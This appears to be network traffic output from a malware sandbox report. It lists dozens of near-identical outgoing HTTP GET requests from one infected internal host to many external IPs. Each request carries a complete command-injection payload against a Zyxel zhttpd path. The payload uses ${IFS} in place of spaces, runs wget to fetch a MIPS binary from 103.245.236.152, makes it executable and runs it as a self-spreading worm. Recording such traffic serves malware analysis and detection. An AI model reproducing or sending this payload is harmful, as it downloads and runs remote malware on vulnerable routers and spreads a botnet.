                                        Jan 14, 2024 16:19:00.843545914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8792192.168.2.1336900104.191.232.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843568087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8793192.168.2.1347106143.194.182.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843621016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8794192.168.2.1339038183.79.215.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843662977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8795192.168.2.1356382128.185.19.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843699932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8796192.168.2.134916076.46.155.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843739033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8797192.168.2.134625875.70.117.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843771935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8798192.168.2.1334482152.191.141.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843815088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8799192.168.2.1338052134.47.130.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843849897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8800192.168.2.1349308201.9.170.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843899012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8801192.168.2.1339038186.181.169.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843941927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8802192.168.2.1359020185.48.252.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843978882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8803192.168.2.134325868.27.58.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844017982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8804192.168.2.1349652203.11.168.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844058990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8805192.168.2.1360280199.10.181.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844104052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8806192.168.2.1343412196.211.157.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844152927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8807192.168.2.1360136153.49.185.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844196081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8808192.168.2.134906469.123.156.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844250917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8809192.168.2.135466649.88.9.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844293118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8810192.168.2.1342104192.62.137.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844319105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8811192.168.2.133805657.140.19.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844342947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8812192.168.2.135920682.106.94.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844377995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8813192.168.2.1354198198.2.115.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844408989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8814192.168.2.1350910220.8.36.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844466925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8815192.168.2.1334442123.61.95.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844500065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8816192.168.2.136026657.88.113.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844548941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8817192.168.2.1350828122.46.118.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844585896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8818192.168.2.135894467.40.174.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844661951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8819192.168.2.1357498152.47.127.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844690084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8820192.168.2.134281474.44.28.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844712019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8821192.168.2.1341154113.174.78.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844765902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8822192.168.2.1359484179.149.96.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844791889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8823192.168.2.1334800132.9.43.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844830990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8824192.168.2.1352742178.73.196.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844901085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8825192.168.2.1338242184.212.201.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844932079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8826192.168.2.1360052190.182.90.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.844965935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8827192.168.2.135222218.7.29.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845000982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8828192.168.2.1336426160.250.201.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845026970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8829192.168.2.134209492.12.101.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845082045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8830192.168.2.13591988.0.230.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845118046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8831192.168.2.135649031.189.205.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845150948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8832192.168.2.1334814213.203.71.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845172882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8833192.168.2.134793664.247.159.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845244884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8834192.168.2.136085289.84.245.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845268011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8835192.168.2.134830654.126.177.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845319033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8836192.168.2.1359522191.219.11.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845355034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8837192.168.2.133704220.78.99.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845418930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8838192.168.2.1360658140.163.103.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845431089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8839192.168.2.1344300104.187.26.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845490932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8840192.168.2.1345924193.196.140.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845567942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8841192.168.2.134575479.205.31.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845596075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8842192.168.2.135170840.210.26.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845613003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8843192.168.2.1338170221.128.141.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845643997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8844192.168.2.133285891.28.239.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845696926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8845192.168.2.1356976184.66.79.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845741987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8846192.168.2.1344022122.167.115.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845813990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8847192.168.2.135502441.218.28.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845813990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8848192.168.2.134119272.185.76.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845845938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8849192.168.2.134004417.108.202.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845897913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8850192.168.2.1336802223.32.139.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845916986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8851192.168.2.136000097.250.139.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.845966101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8852192.168.2.1355884118.172.152.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846018076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8853192.168.2.1351248141.229.248.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846055984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8854192.168.2.134221881.201.102.70443
                                        TimestampBytes transferredDirectionData
